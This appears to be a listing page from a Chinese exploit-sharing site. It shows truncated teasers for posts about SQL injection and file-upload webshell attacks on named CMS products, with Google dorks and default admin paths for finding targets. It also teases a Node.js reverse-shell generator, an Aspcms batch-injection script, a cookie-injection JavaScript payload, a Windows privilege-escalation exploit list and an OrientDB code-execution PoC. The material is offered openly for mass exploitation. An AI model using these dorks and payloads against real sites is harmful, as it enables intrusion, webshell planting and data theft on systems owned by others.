某企业CMS管理系统通用SQL注入漏洞+GETSHELL
关键词: inurl:index.php?ie= 技术支持: 宝鸡市世纪网络技术有限公司
默认后台:Adm/governlgn.php 或者 Admin/governlgn.php
均存在POST注入
进入后台,可设置上传类型,直接GETSHELL,不...
wqcms6.0构造上传getshell(仅限IIS6.0)
漏洞文件:admin_UploadDataHandler.ashx 自定义构造上传点
poc:
<html>
<body>
<form act...
Node.js反序列化利用Exp
#!/usr/bin/python
# Generator for encoded NodeJS reverse shells
# Based on the NodeJS reverse shell by Evilpacket
# https://github.com/evi...
Aspcms批量注入Exp
作者:ADminSS
#!/use/bin/python
# -*- coding: utf-8 -*-
import urllib2
version = '''
+-----------------------------------...
任意文件上传漏洞批量拿SHELL
谷歌关键字:inurl:newslist.asp?NodeCode=
利用方式:/admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp
...
asp类型网站漏洞0day总结
启航企业建站系统 cookie注入漏洞通杀所有版本
直接上exploit:
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,user...
PHP变量覆盖漏洞总结
一、全局变量覆盖
当register_global=ON时,变量来源可能是各个不同的地方,比如页面的表单,Cookie等。
<?php
echo "Register_globals: ".(int)ini_get("register_globals")."&l...
大牛总结的Window提权Exp合集
刚刚分享Linux现在再来一份window的
漏洞列表
#Security Bulletin #KB #Description #Operating System
CVE-2017-0213 [Windows CO...
OrientDB <=2.22 代码执行漏洞
关于OrientDB
OrientDB是一个分布式图形数据库引擎,具有文档数据库的灵活性,一体化的产品。第一个也是最好的可升级,高性能,可操作的NoSQL数据库。
不说过多话语
直接附上
poc
#!...